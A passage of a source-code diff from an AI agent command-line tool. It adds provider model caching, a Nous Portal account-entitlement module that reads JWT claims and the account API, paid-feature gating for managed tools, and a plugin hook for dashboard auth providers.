normalized = normalize_provider(provider) or (provider or "")
if not normalized:
return []
cache = _load_provider_models_cache()
fp = _credential_fingerprint(normalized)
entry = cache.get(normalized)
now = time.time()
if (
not force_refresh
and isinstance(entry, dict)
and entry.get("fp") == fp
and isinstance(entry.get("models"), list)
and entry["models"]
and (now - float(entry.get("at", 0))) < ttl_seconds
):
return list(entry["models"])
# Cache miss / stale / forced refresh — call the live path.
live = provider_model_ids(normalized, force_refresh=force_refresh)
if live:
cache[normalized] = {
"fp": fp,
"at": now,
"models": list(live),
}
_save_provider_models_cache(cache)
return list(live)
# Live fetch returned nothing. If we have a stale entry with the
# SAME fingerprint, prefer it over an empty result — stale data
# beats no data when the network is flaky.
if (
isinstance(entry, dict)
and entry.get("fp") == fp
and isinstance(entry.get("models"), list)
and entry["models"]
):
return list(entry["models"])
return list(live or [])
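Reviewer note: the lookup order in `cached_provider_model_ids` (fresh hit, then live fetch, then stale entry with the same fingerprint, then empty) is easier to verify with the disk I/O removed. The sketch below uses an in-memory dict and an injected `fetch` callable; both are assumptions made for illustration, and `cached_ids_sketch` is a hypothetical name.

```python
import time
from typing import Callable


def cached_ids_sketch(
    cache: dict,
    provider: str,
    fp: str,
    fetch: Callable[[], list[str]],
    *,
    ttl_seconds: int = 3600,
    force_refresh: bool = False,
) -> list[str]:
    """Illustrative only: TTL + fingerprint cache with stale fallback."""
    entry = cache.get(provider)
    now = time.time()
    # An entry is usable only if it matches the fingerprint and is non-empty.
    usable = (
        isinstance(entry, dict)
        and entry.get("fp") == fp
        and isinstance(entry.get("models"), list)
        and bool(entry["models"])
    )
    if usable and not force_refresh and (now - float(entry.get("at", 0))) < ttl_seconds:
        return list(entry["models"])
    live = fetch()
    if live:
        # Only non-empty results are stored, so a transient failure is never pinned.
        cache[provider] = {"fp": fp, "at": now, "models": list(live)}
        return list(live)
    if usable:
        return list(entry["models"])  # stale data beats no data
    return []
```

A changed fingerprint makes the old entry unusable for both the fresh-hit and the stale-fallback paths, so models fetched under one credential are never served under another.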
def clear_provider_models_cache(provider: Optional[str] = None) -> None:
"""Drop a single provider's cache entry, or wipe the whole cache.
``provider=None`` wipes everything; otherwise only that provider's
entry is removed. Used by ``/model --refresh`` and
``hermes model --refresh``.
"""
try:
if provider is None:
path = _provider_models_cache_path()
if path.exists():
path.unlink()
return
cache = _load_provider_models_cache()
normalized = normalize_provider(provider) or provider or ""
if normalized in cache:
del cache[normalized]
_save_provider_models_cache(cache)
except Exception:
pass
def _fetch_anthropic_models(timeout: float = 5.0) -> Optional[list[str]]:
"""Fetch available models from the Anthropic /v1/models endpoint.
@@ -3015,6 +3047,8 @@ def opencode_model_api_mode(provider_id: Optional[str], model_id: Optional[str])
if provider == "opencode-go":
if normalized.startswith("minimax-"):
return "anthropic_messages"
if normalized.startswith("qwen3.7-max"):
return "anthropic_messages"
return "chat_completions"
if provider == "opencode-zen":
@@ -3149,36 +3183,6 @@ def probe_api_models(
}
def _fetch_ai_gateway_models(timeout: float = 5.0) -> Optional[list[str]]:
"""Fetch available language models with tool-use from AI Gateway."""
api_key = os.getenv("AI_GATEWAY_API_KEY", "").strip()
if not api_key:
return None
base_url = os.getenv("AI_GATEWAY_BASE_URL", "").strip()
if not base_url:
from hermes_constants import AI_GATEWAY_BASE_URL
base_url = AI_GATEWAY_BASE_URL
url = base_url.rstrip("/") + "/models"
headers: dict[str, str] = {
"Authorization": f"Bearer {api_key}",
"User-Agent": _HERMES_USER_AGENT,
}
req = urllib.request.Request(url, headers=headers)
try:
with urllib.request.urlopen(req, timeout=timeout) as resp:
data = json.loads(resp.read().decode())
return [
m["id"]
for m in data.get("data", [])
if m.get("id")
and m.get("type") == "language"
and "tool-use" in (m.get("tags") or [])
]
except Exception:
return None
def fetch_api_models(
api_key: Optional[str],
base_url: Optional[str],
+678
@@ -0,0 +1,678 @@
"""Normalized Nous Portal account entitlement helpers."""
from __future__ import annotations
import hashlib
import json
import time
import urllib.request
from dataclasses import dataclass
from datetime import datetime, timezone
from typing import Any, Literal, Optional
NousAccountInfoSource = Literal["jwt", "account_api", "inference_key", "none", "error"]
_ACCOUNT_INFO_CACHE_TTL = 60
_account_info_cache: tuple[str, float, "NousPortalAccountInfo"] | None = None
@dataclass(frozen=True)
class NousPortalSubscriptionInfo:
plan: Optional[str] = None
tier: Optional[int] = None
monthly_charge: Optional[float] = None
current_period_end: Optional[str] = None
credits_remaining: Optional[float] = None
rollover_credits: Optional[float] = None
@dataclass(frozen=True)
class NousPaidServiceAccessInfo:
allowed: Optional[bool] = None
paid_access: Optional[bool] = None
reason: Optional[str] = None
organisation_id: Optional[str] = None
effective_at_ms: Optional[int] = None
has_active_subscription: Optional[bool] = None
active_subscription_is_paid: Optional[bool] = None
subscription_tier: Optional[int] = None
subscription_monthly_charge: Optional[float] = None
subscription_credits_remaining: Optional[float] = None
purchased_credits_remaining: Optional[float] = None
total_usable_credits: Optional[float] = None
@dataclass(frozen=True)
class NousPortalAccountInfo:
logged_in: bool
source: NousAccountInfoSource
fresh: bool
user_id: Optional[str] = None
org_id: Optional[str] = None
client_id: Optional[str] = None
product_id: Optional[str] = None
nous_client: Optional[str] = None
portal_base_url: Optional[str] = None
inference_base_url: Optional[str] = None
inference_credential_present: bool = False
credential_source: Optional[str] = None
expires_at: Optional[datetime] = None
email: Optional[str] = None
privy_did: Optional[str] = None
subscription: Optional[NousPortalSubscriptionInfo] = None
paid_service_access: Optional[bool] = None
paid_service_access_info: Optional[NousPaidServiceAccessInfo] = None
raw_claims: Optional[dict[str, Any]] = None
raw_account: Optional[dict[str, Any]] = None
error: Optional[str] = None
@property
def is_paid(self) -> bool:
return self.paid_service_access is True
@property
def is_free_tier(self) -> bool:
return self.paid_service_access is False
@property
def tool_gateway_entitled(self) -> bool:
return self.paid_service_access is True
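Reviewer note: `paid_service_access` is tri-state (`True`, `False`, or `None` for unknown), and the properties above use identity checks so that the unknown state is neither paid nor free. A stripped-down sketch, with the hypothetical class name `EntitlementSketch` standing in for the full dataclass:

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class EntitlementSketch:
    """Illustrative only: a tri-state entitlement flag."""

    paid_service_access: Optional[bool] = None  # None means "unknown"

    @property
    def is_paid(self) -> bool:
        # Identity check: None (unknown) must not count as paid.
        return self.paid_service_access is True

    @property
    def is_free_tier(self) -> bool:
        # Identity check: None (unknown) must not count as free either.
        return self.paid_service_access is False
```

With `not self.paid_service_access` in place of `is False`, an account whose lookup failed would be reported as free tier, which is the case the compatibility wrapper in `check_nous_free_tier` is documented to avoid.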
def nous_portal_billing_url(account_info: Optional[NousPortalAccountInfo] = None) -> str:
"""Return the billing URL for a normalized Nous account snapshot."""
try:
from hermes_cli.auth import DEFAULT_NOUS_PORTAL_URL
except Exception:
DEFAULT_NOUS_PORTAL_URL = "https://portal.nousresearch.com"
base = None
if account_info is not None:
base = account_info.portal_base_url
if not isinstance(base, str) or not base.strip():
base = DEFAULT_NOUS_PORTAL_URL
return f"{base.rstrip('/')}/billing"
def format_nous_portal_entitlement_message(
account_info: Optional[NousPortalAccountInfo],
*,
capability: str = "this feature",
include_refresh_hint: bool = True,
) -> Optional[str]:
"""Return user-facing guidance for a missing Nous paid entitlement.
``None`` means the account is known to have paid service access. The
message intentionally works from normalized entitlement fields rather than
subscription price alone: purchased credits without a subscription still
count as paid access, while a paid subscription with exhausted usable
credits does not.
"""
billing_url = nous_portal_billing_url(account_info)
if account_info is not None and account_info.paid_service_access is True:
return None
if account_info is None:
return (
f"Hermes could not verify your Nous Portal entitlement, so {capability} "
f"is unavailable. Run `hermes model` to refresh your login, or check "
f"billing at {billing_url}."
)
if not account_info.logged_in:
if account_info.inference_credential_present:
return (
f"Nous inference credentials are configured, but Hermes cannot verify "
f"your Nous Portal paid access for {capability}. Log in with "
f"`hermes model` to enable Portal-managed features. Billing and "
f"credits are managed at {billing_url}."
)
return (
f"Log in to Nous Portal to use {capability}: run `hermes model`. "
f"Billing and credits are managed at {billing_url}."
)
if account_info.paid_service_access is None:
detail = (
f"Hermes could not verify your Nous Portal paid access, so {capability} "
f"is unavailable."
)
if account_info.error:
detail += f" Account lookup failed: {account_info.error}."
if include_refresh_hint:
detail += " Run `hermes model` to refresh your session."
detail += f" Check billing at {billing_url}."
return detail
access = account_info.paid_service_access_info
reason = access.reason if access else None
if reason == "account_missing":
return (
f"Hermes could not find a Nous Portal account or organisation for this "
f"login, so {capability} is unavailable. Run `hermes model` to "
f"authenticate again; if the problem persists, contact Nous support."
)
if reason == "no_usable_credits" or account_info.paid_service_access is False:
message = _no_paid_access_message(account_info, capability, billing_url)
if include_refresh_hint and not account_info.fresh:
message += " If you recently bought credits, run `hermes model` to refresh Hermes."
return message
return (
f"Your Nous Portal account does not currently have paid service access, "
f"so {capability} is unavailable. Add credits or update billing at {billing_url}."
)
def _no_paid_access_message(
account_info: NousPortalAccountInfo,
capability: str,
billing_url: str,
) -> str:
access = account_info.paid_service_access_info
has_active_subscription = access.has_active_subscription if access else None
active_subscription_is_paid = access.active_subscription_is_paid if access else None
total_usable = access.total_usable_credits if access else None
subscription_credits = access.subscription_credits_remaining if access else None
purchased_credits = access.purchased_credits_remaining if access else None
if has_active_subscription and active_subscription_is_paid:
credit_detail = _credit_detail(total_usable, subscription_credits, purchased_credits)
return (
f"Your Nous Portal credits are exhausted{credit_detail}, so {capability} "
f"is unavailable. Top up or renew credits at {billing_url}."
)
if has_active_subscription and active_subscription_is_paid is False:
return (
f"Your current Nous Portal plan does not include paid service access, "
f"so {capability} is unavailable. Upgrade or add credits at {billing_url}."
)
if has_active_subscription is False:
credit_detail = _credit_detail(total_usable, subscription_credits, purchased_credits)
return (
f"Your Nous Portal account has no active subscription or usable credits"
f"{credit_detail}, so {capability} is unavailable. Subscribe or add credits "
f"at {billing_url}."
)
credit_detail = _credit_detail(total_usable, subscription_credits, purchased_credits)
return (
f"Your Nous Portal account has no usable paid credits{credit_detail}, so "
f"{capability} is unavailable. Add credits or update billing at {billing_url}."
)
def _credit_detail(
total_usable: Optional[float],
subscription_credits: Optional[float],
purchased_credits: Optional[float],
) -> str:
parts: list[str] = []
if total_usable is not None:
parts.append(f"usable ${total_usable:.2f}")
if subscription_credits is not None:
parts.append(f"subscription ${subscription_credits:.2f}")
if purchased_credits is not None:
parts.append(f"purchased ${purchased_credits:.2f}")
if not parts:
return ""
return f" ({', '.join(parts)})"
def reset_nous_portal_account_info_cache() -> None:
"""Clear the short-lived account-info cache used by tests."""
global _account_info_cache
_account_info_cache = None
def get_nous_portal_account_info(
*,
force_fresh: bool = False,
min_jwt_ttl_seconds: int = 60,
) -> NousPortalAccountInfo:
"""Return normalized Nous Portal account entitlement information.
By default, a valid unexpired OAuth access JWT is used as a low-latency
local account snapshot. ``force_fresh=True`` always calls
``/api/oauth/account`` and bypasses the short-lived cache. JWT claims are
decoded locally for UX gating only; server APIs remain authoritative.
"""
try:
from hermes_cli.auth import get_provider_auth_state
state = get_provider_auth_state("nous") or {}
except Exception as exc:
return _error_info(error=exc, logged_in=False)
access_token = state.get("access_token")
portal_base_url = _portal_base_url(state)
if not isinstance(access_token, str) or not access_token.strip():
pool_oauth_info = _info_from_oauth_pool(
force_fresh=force_fresh,
min_jwt_ttl_seconds=min_jwt_ttl_seconds,
portal_base_url=portal_base_url,
)
if pool_oauth_info is not None:
return pool_oauth_info
pool_info = _info_from_inference_key_pool(portal_base_url)
if pool_info is not None:
return pool_info
return NousPortalAccountInfo(
logged_in=False,
source="none",
fresh=False,
portal_base_url=portal_base_url,
)
if not force_fresh:
jwt_info = _info_from_valid_jwt(
access_token,
state=state,
portal_base_url=portal_base_url,
min_jwt_ttl_seconds=min_jwt_ttl_seconds,
)
if jwt_info is not None:
return jwt_info
return _fresh_account_info(
state=state,
force_fresh=force_fresh,
portal_base_url=portal_base_url,
)
def _fresh_account_info(
*,
state: dict[str, Any],
force_fresh: bool,
portal_base_url: Optional[str],
) -> NousPortalAccountInfo:
global _account_info_cache
try:
from hermes_cli.auth import get_provider_auth_state, resolve_nous_access_token
access_token = resolve_nous_access_token()
refreshed_state = get_provider_auth_state("nous") or state
portal_base_url = _portal_base_url(refreshed_state) or portal_base_url
cache_key = _cache_key(access_token, portal_base_url)
if not force_fresh and _account_info_cache is not None:
cached_key, cached_at, cached_info = _account_info_cache
if cached_key == cache_key and (time.monotonic() - cached_at) < _ACCOUNT_INFO_CACHE_TTL:
return cached_info
payload = _fetch_nous_account_info(access_token, portal_base_url)
if not payload:
return _error_info(
error="empty_account_response",
logged_in=True,
portal_base_url=portal_base_url,
)
if isinstance(payload.get("error"), str):
return _error_info(
error=payload.get("error") or "account_response_error",
logged_in=True,
portal_base_url=portal_base_url,
raw_account=payload,
)
info = _info_from_account_payload(
payload,
state=refreshed_state,
portal_base_url=portal_base_url,
)
_account_info_cache = (cache_key, time.monotonic(), info)
return info
except Exception as exc:
return _error_info(
error=exc,
logged_in=bool(state.get("access_token")),
portal_base_url=portal_base_url,
)
def _info_from_inference_key_pool(
portal_base_url: Optional[str],
) -> Optional[NousPortalAccountInfo]:
"""Return an explicit unknown-entitlement snapshot for opaque Nous keys."""
try:
entry = _select_nous_pool_entry()
if entry is None:
return None
runtime_key = getattr(entry, "runtime_api_key", None) or getattr(entry, "access_token", "")
if not isinstance(runtime_key, str) or not runtime_key.strip():
return None
return NousPortalAccountInfo(
logged_in=False,
source="inference_key",
fresh=False,
portal_base_url=(
getattr(entry, "portal_base_url", None)
or portal_base_url
),
inference_base_url=(
getattr(entry, "inference_base_url", None)
or getattr(entry, "runtime_base_url", None)
or getattr(entry, "base_url", None)
),
inference_credential_present=True,
credential_source=f"pool:{getattr(entry, 'label', 'unknown')}",
error="portal_oauth_missing",
)
except Exception:
return None
def _info_from_oauth_pool(
*,
force_fresh: bool,
min_jwt_ttl_seconds: int,
portal_base_url: Optional[str],
) -> Optional[NousPortalAccountInfo]:
try:
entry = _select_nous_pool_entry()
except Exception:
return None
if entry is None or not _pool_entry_is_portal_oauth(entry):
return None
access_token = getattr(entry, "access_token", None)
if not isinstance(access_token, str) or not access_token.strip():
return None
entry_portal_url = (
getattr(entry, "portal_base_url", None)
or portal_base_url
)
state = {
"access_token": access_token,
"client_id": getattr(entry, "client_id", None),
"inference_base_url": (
getattr(entry, "inference_base_url", None)
or getattr(entry, "runtime_base_url", None)
or getattr(entry, "base_url", None)
),
"agent_key": getattr(entry, "agent_key", None),
"credential_source": f"pool:{getattr(entry, 'label', 'unknown')}",
}
if not force_fresh:
jwt_info = _info_from_valid_jwt(
access_token,
state=state,
portal_base_url=entry_portal_url,
min_jwt_ttl_seconds=min_jwt_ttl_seconds,
)
if jwt_info is not None:
return jwt_info
try:
payload = _fetch_nous_account_info(access_token, entry_portal_url)
except Exception as exc:
return _error_info(
error=exc,
logged_in=True,
portal_base_url=entry_portal_url,
)
if not payload:
return _error_info(
error="empty_account_response",
logged_in=True,
portal_base_url=entry_portal_url,
)
if isinstance(payload.get("error"), str):
return _error_info(
error=payload.get("error") or "account_response_error",
logged_in=True,
portal_base_url=entry_portal_url,
raw_account=payload,
)
return _info_from_account_payload(
payload,
state=state,
portal_base_url=entry_portal_url,
)
def _select_nous_pool_entry() -> Optional[Any]:
from agent.credential_pool import load_pool
pool = load_pool("nous")
if not pool or not pool.has_credentials():
return None
entries = list(pool.entries())
if not entries:
return None
def _entry_sort_key(entry: Any) -> tuple[float, float, int]:
agent_exp = _parse_iso_timestamp(getattr(entry, "agent_key_expires_at", None)) or 0.0
access_exp = _parse_iso_timestamp(getattr(entry, "expires_at", None)) or 0.0
priority = int(getattr(entry, "priority", 0) or 0)
return (agent_exp, access_exp, -priority)
return max(entries, key=_entry_sort_key)
def _pool_entry_is_portal_oauth(entry: Any) -> bool:
access_token = getattr(entry, "access_token", None)
if not isinstance(access_token, str) or not access_token.strip():
return False
auth_type = str(getattr(entry, "auth_type", "") or "").strip().lower()
refresh_token = getattr(entry, "refresh_token", None)
return auth_type.startswith("oauth") or bool(refresh_token)
def _fetch_nous_account_info(
access_token: str,
portal_base_url: Optional[str] = None,
) -> dict[str, Any]:
base = (portal_base_url or "https://portal.nousresearch.com").rstrip("/")
url = f"{base}/api/oauth/account"
headers = {
"Authorization": f"Bearer {access_token}",
"Accept": "application/json",
}
req = urllib.request.Request(url, headers=headers)
with urllib.request.urlopen(req, timeout=8) as resp:
payload = json.loads(resp.read().decode())
return payload if isinstance(payload, dict) else {}
def _info_from_valid_jwt(
token: str,
*,
state: dict[str, Any],
portal_base_url: Optional[str],
min_jwt_ttl_seconds: int,
) -> Optional[NousPortalAccountInfo]:
try:
from hermes_cli.auth import _decode_jwt_claims
except Exception:
return None
claims = _decode_jwt_claims(token)
if not claims:
return None
exp = _coerce_float(claims.get("exp"))
if exp is None or exp <= time.time() + max(0, int(min_jwt_ttl_seconds)):
return None
paid_access = _coerce_bool(claims.get("paid_access"))
subscription_tier = _coerce_int(claims.get("subscription_tier"))
access_info = NousPaidServiceAccessInfo(
allowed=paid_access,
paid_access=paid_access,
organisation_id=_coerce_str(claims.get("org_id")),
subscription_tier=subscription_tier,
)
return NousPortalAccountInfo(
logged_in=True,
source="jwt",
fresh=False,
user_id=_coerce_str(claims.get("sub")),
org_id=_coerce_str(claims.get("org_id")),
client_id=_coerce_str(claims.get("client_id") or state.get("client_id")),
product_id=_coerce_str(claims.get("product_id")),
nous_client=_coerce_str(claims.get("nous_client")),
portal_base_url=portal_base_url,
inference_base_url=_coerce_str(state.get("inference_base_url")),
inference_credential_present=True,
credential_source=_coerce_str(state.get("credential_source")) or "auth_store",
expires_at=datetime.fromtimestamp(exp, tz=timezone.utc),
paid_service_access=paid_access,
paid_service_access_info=access_info,
raw_claims=dict(claims),
)
def _info_from_account_payload(
payload: dict[str, Any],
*,
state: dict[str, Any],
portal_base_url: Optional[str],
) -> NousPortalAccountInfo:
user = payload.get("user") if isinstance(payload.get("user"), dict) else {}
organisation = (
payload.get("organisation")
if isinstance(payload.get("organisation"), dict)
else {}
)
subscription = _subscription_from_payload(payload.get("subscription"))
access = _paid_service_access_from_payload(payload.get("paid_service_access"))
paid_access = access.allowed if access else None
if paid_access is None and access is not None:
paid_access = access.paid_access
return NousPortalAccountInfo(
logged_in=True,
source="account_api",
fresh=True,
org_id=_coerce_str(organisation.get("id")) or (access.organisation_id if access else None),
client_id=_coerce_str(state.get("client_id")),
portal_base_url=portal_base_url,
inference_base_url=_coerce_str(state.get("inference_base_url")),
inference_credential_present=bool(state.get("access_token") or state.get("agent_key")),
credential_source=_coerce_str(state.get("credential_source")) or "auth_store",
email=_coerce_str(user.get("email")),
privy_did=_coerce_str(user.get("privy_did")),
subscription=subscription,
paid_service_access=paid_access,
paid_service_access_info=access,
raw_account=dict(payload),
)
def _subscription_from_payload(value: Any) -> Optional[NousPortalSubscriptionInfo]:
if not isinstance(value, dict):
return None
return NousPortalSubscriptionInfo(
plan=_coerce_str(value.get("plan")),
tier=_coerce_int(value.get("tier")),
monthly_charge=_coerce_float(value.get("monthly_charge")),
current_period_end=_coerce_str(value.get("current_period_end")),
credits_remaining=_coerce_float(value.get("credits_remaining")),
rollover_credits=_coerce_float(value.get("rollover_credits")),
)
def _paid_service_access_from_payload(value: Any) -> Optional[NousPaidServiceAccessInfo]:
if not isinstance(value, dict):
return None
allowed = _coerce_bool(value.get("allowed"))
paid_access = _coerce_bool(value.get("paid_access"))
return NousPaidServiceAccessInfo(
allowed=allowed,
paid_access=paid_access,
reason=_coerce_str(value.get("reason")),
organisation_id=_coerce_str(value.get("organisation_id")),
effective_at_ms=_coerce_int(value.get("effective_at_ms")),
has_active_subscription=_coerce_bool(value.get("has_active_subscription")),
active_subscription_is_paid=_coerce_bool(value.get("active_subscription_is_paid")),
subscription_tier=_coerce_int(value.get("subscription_tier")),
subscription_monthly_charge=_coerce_float(value.get("subscription_monthly_charge")),
subscription_credits_remaining=_coerce_float(value.get("subscription_credits_remaining")),
purchased_credits_remaining=_coerce_float(value.get("purchased_credits_remaining")),
total_usable_credits=_coerce_float(value.get("total_usable_credits")),
)
def _error_info(
*,
error: object,
logged_in: bool,
portal_base_url: Optional[str] = None,
raw_account: Optional[dict[str, Any]] = None,
) -> NousPortalAccountInfo:
return NousPortalAccountInfo(
logged_in=logged_in,
source="error",
fresh=False,
portal_base_url=portal_base_url,
raw_account=raw_account,
error=str(error),
)
def _portal_base_url(state: dict[str, Any]) -> Optional[str]:
value = state.get("portal_base_url")
if not isinstance(value, str) or not value.strip():
return None
return value.strip().rstrip("/")
def _cache_key(access_token: str, portal_base_url: Optional[str]) -> str:
digest = hashlib.sha256(access_token.encode("utf-8")).hexdigest()
return f"{portal_base_url or ''}:{digest}"
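The caching in `_fresh_account_info` can be sketched in isolation as follows. This is a minimal illustration, not the module's code: `cached_fetch`, the `fetch` callable, and the 60-second TTL are assumptions (the real `_ACCOUNT_INFO_CACHE_TTL` value is not shown in this diff). It keeps a single cache slot keyed by a SHA-256 digest of the token, so the raw secret never appears in the key, and it measures age with `time.monotonic()` so wall-clock changes do not affect expiry.

```python
import hashlib
import time
from typing import Any, Callable, Optional

# Assumed value for illustration; the real TTL constant is not shown in the diff.
_CACHE_TTL_SECONDS = 60.0
_cache: Optional[tuple[str, float, Any]] = None


def cache_key(access_token: str, portal_base_url: Optional[str]) -> str:
    # Hash the token so the raw secret is never part of the cache key.
    digest = hashlib.sha256(access_token.encode("utf-8")).hexdigest()
    return f"{portal_base_url or ''}:{digest}"


def cached_fetch(
    access_token: str,
    portal_base_url: Optional[str],
    fetch: Callable[[str, Optional[str]], Any],  # hypothetical fetcher
    *,
    force_fresh: bool = False,
) -> Any:
    """Return a cached value when the key matches and the entry is young enough."""
    global _cache
    key = cache_key(access_token, portal_base_url)
    if not force_fresh and _cache is not None:
        cached_key, cached_at, cached_value = _cache
        if cached_key == key and (time.monotonic() - cached_at) < _CACHE_TTL_SECONDS:
            return cached_value
    value = fetch(access_token, portal_base_url)
    _cache = (key, time.monotonic(), value)
    return value
```

A different token or portal URL produces a different key, so the single slot is simply overwritten on the next fetch.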
def _parse_iso_timestamp(value: Any) -> Optional[float]:
if not isinstance(value, str) or not value:
return None
text = value.strip()
if text.endswith("Z"):
text = text[:-1] + "+00:00"
try:
return datetime.fromisoformat(text).timestamp()
except Exception:
return None
def _coerce_str(value: Any) -> Optional[str]:
if isinstance(value, str) and value:
return value
return None
def _coerce_bool(value: Any) -> Optional[bool]:
return value if isinstance(value, bool) else None
def _coerce_int(value: Any) -> Optional[int]:
if isinstance(value, bool):
return None
try:
if value is None:
return None
return int(value)
except (TypeError, ValueError):
return None
def _coerce_float(value: Any) -> Optional[float]:
if isinstance(value, bool):
return None
try:
if value is None:
return None
return float(value)
except (TypeError, ValueError):
return None
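The coercion and timestamp helpers above can be exercised on their own. The sketch below copies the logic of `_coerce_int` and `_parse_iso_timestamp` under public names (the renaming is only for illustration) to show two behaviours that are easy to miss: booleans are rejected rather than treated as `0`/`1`, and a trailing `Z` is rewritten to `+00:00` before parsing, which keeps the helper working on Python versions whose `datetime.fromisoformat` does not accept `Z`.

```python
from datetime import datetime
from typing import Any, Optional


def coerce_int(value: Any) -> Optional[int]:
    # bool is a subclass of int, so it must be rejected explicitly.
    if isinstance(value, bool):
        return None
    try:
        if value is None:
            return None
        return int(value)
    except (TypeError, ValueError):
        return None


def parse_iso_timestamp(value: Any) -> Optional[float]:
    if not isinstance(value, str) or not value:
        return None
    text = value.strip()
    # Normalise the UTC designator so older fromisoformat() versions accept it.
    if text.endswith("Z"):
        text = text[:-1] + "+00:00"
    try:
        return datetime.fromisoformat(text).timestamp()
    except Exception:
        return None


print(coerce_int(True), coerce_int("3"), coerce_int("x"))
print(parse_iso_timestamp("2024-01-01T00:00:00Z"))
```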
+40 -11
@@ -6,8 +6,8 @@ from dataclasses import dataclass
from pathlib import Path
from typing import Dict, Iterable, Optional, Set
from hermes_cli.auth import get_nous_auth_status
from hermes_cli.config import get_env_value, load_config
from hermes_cli.nous_account import NousPortalAccountInfo, get_nous_portal_account_info
from tools.managed_tool_gateway import is_managed_tool_gateway_ready
from utils import is_truthy_value
from tools.tool_backend_helpers import (
@@ -53,6 +53,7 @@ class NousSubscriptionFeatures:
nous_auth_present: bool
provider_is_nous: bool
features: Dict[str, NousFeatureState]
account_info: Optional[NousPortalAccountInfo] = None
@property
def web(self) -> NousFeatureState:
@@ -227,6 +228,8 @@ def _resolve_browser_feature_state(
def get_nous_subscription_features(
config: Optional[Dict[str, object]] = None,
*,
force_fresh: bool = False,
) -> NousSubscriptionFeatures:
if config is None:
config = load_config() or {}
@@ -235,12 +238,19 @@ def get_nous_subscription_features(
provider_is_nous = str(model_cfg.get("provider") or "").strip().lower() == "nous"
try:
nous_status = get_nous_auth_status()
if force_fresh:
account_info = get_nous_portal_account_info(force_fresh=True)
else:
account_info = get_nous_portal_account_info()
except Exception:
nous_status = {}
account_info = None
managed_tools_flag = managed_nous_tools_enabled()
nous_auth_present = bool(nous_status.get("logged_in"))
managed_tools_flag = bool(
account_info
and account_info.logged_in
and account_info.paid_service_access is True
)
nous_auth_present = bool(account_info and account_info.logged_in)
subscribed = provider_is_nous or nous_auth_present
web_tool_enabled = _toolset_enabled(config, "web")
@@ -317,6 +327,7 @@ def get_nous_subscription_features(
modal_mode,
has_direct=direct_modal,
managed_ready=managed_modal_available,
managed_enabled=managed_tools_flag,
)
web_managed = web_backend == "firecrawl" and managed_web_available and not direct_firecrawl
@@ -483,6 +494,7 @@ def get_nous_subscription_features(
nous_auth_present=nous_auth_present,
provider_is_nous=provider_is_nous,
features=features,
account_info=account_info,
)
@@ -493,11 +505,15 @@ def apply_nous_managed_defaults(
config: Dict[str, object],
*,
enabled_toolsets: Optional[Iterable[str]] = None,
force_fresh: bool = False,
) -> set[str]:
if not managed_nous_tools_enabled():
features = get_nous_subscription_features(config, force_fresh=force_fresh)
if not (
features.account_info
and features.account_info.logged_in
and features.account_info.paid_service_access is True
):
return set()
features = get_nous_subscription_features(config)
if not features.provider_is_nous:
return set()
@@ -594,6 +610,8 @@ _ALL_GATEWAY_KEYS = ("web", "image_gen", "tts", "browser")
def get_gateway_eligible_tools(
config: Optional[Dict[str, object]] = None,
*,
force_fresh: bool = False,
) -> tuple[list[str], list[str], list[str]]:
"""Return (unconfigured, has_direct, already_managed) tool key lists.
@@ -604,7 +622,11 @@ def get_gateway_eligible_tools(
All lists are empty when the user is not a paid Nous subscriber or
is not using Nous as their provider.
"""
if not managed_nous_tools_enabled():
if force_fresh:
managed_enabled = managed_nous_tools_enabled(force_fresh=True)
else:
managed_enabled = managed_nous_tools_enabled()
if not managed_enabled:
return [], [], []
if config is None:
@@ -695,7 +717,11 @@ def apply_gateway_defaults(
return changed
def prompt_enable_tool_gateway(config: Dict[str, object]) -> set[str]:
def prompt_enable_tool_gateway(
config: Dict[str, object],
*,
force_fresh: bool = True,
) -> set[str]:
"""If eligible tools exist, prompt the user to enable the Tool Gateway.
Uses prompt_choice() with a description parameter so the curses TUI
@@ -704,7 +730,10 @@ def prompt_enable_tool_gateway(config: Dict[str, object]) -> set[str]:
Returns the set of tools that were enabled, or empty set if the user
declined or no tools were eligible.
"""
unconfigured, has_direct, already_managed = get_gateway_eligible_tools(config)
unconfigured, has_direct, already_managed = get_gateway_eligible_tools(
config,
force_fresh=force_fresh,
)
if not unconfigured and not has_direct:
return set()
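The entitlement gate used in this file treats `paid_service_access` as a tri-state value. A minimal sketch, assuming a trimmed stand-in dataclass (`AccountInfo` is hypothetical and carries only the two fields the gate reads): comparing with `is True` means an unknown entitlement (`None`) is handled the same as an explicit `False`.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass
class AccountInfo:
    """Hypothetical, trimmed stand-in for NousPortalAccountInfo."""

    logged_in: bool
    paid_service_access: Optional[bool] = None


def managed_tools_enabled(info: Optional[AccountInfo]) -> bool:
    # Only an explicit True unlocks managed tools; None (unknown) does not.
    return bool(info and info.logged_in and info.paid_service_access is True)


print(managed_tools_enabled(AccountInfo(logged_in=True)))
print(managed_tools_enabled(AccountInfo(logged_in=True, paid_service_access=True)))
```

This fails closed: a missing account snapshot, a logged-out snapshot, or a JWT without the `paid_access` claim all leave managed defaults untouched.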
+40
@@ -553,6 +553,46 @@ class PluginContext:
self.manifest.name, provider.name,
)
# -- dashboard auth provider registration --------------------------------
def register_dashboard_auth_provider(self, provider) -> None:
"""Register a dashboard authentication provider.
``provider`` must be an instance of
:class:`hermes_cli.dashboard_auth.DashboardAuthProvider`. Used by
the dashboard OAuth auth gate, which engages when the dashboard
binds to a non-loopback host without ``--insecure``.
Misbehaving providers (wrong type, duplicate name) are logged at
WARNING and otherwise ignored (never raised), so a broken plugin
cannot crash the host. Same convention as
``register_image_gen_provider``.
"""
from hermes_cli.dashboard_auth import (
DashboardAuthProvider, register_provider,
)
if not isinstance(provider, DashboardAuthProvider):
logger.warning(
"Plugin '%s' tried to register a dashboard-auth provider "
"that does not inherit from DashboardAuthProvider. Ignoring.",
self.manifest.name,
)
return
try:
register_provider(provider)
except (TypeError, ValueError) as e:
logger.warning(
"Plugin '%s' failed to register dashboard-auth provider "
"%r: %s",
self.manifest.name, getattr(provider, "name", "?"), e,
)
return
logger.info(
"Plugin '%s' registered dashboard-auth provider: %s (%s)",
self.manifest.name, provider.name, provider.display_name,
)
# -- video gen provider registration -------------------------------------
def register_video_gen_provider(self, provider) -> None:
+26 -3
@@ -864,12 +864,35 @@ def _discover_memory_providers() -> list[tuple[str, str]]:
def _discover_context_engines() -> list[tuple[str, str]]:
- """Return [(name, description), ...] for available context engines."""
+ """Return [(name, description), ...] for available context engines.
+ Includes repo-shipped engines from ``plugins/context_engine/`` AND
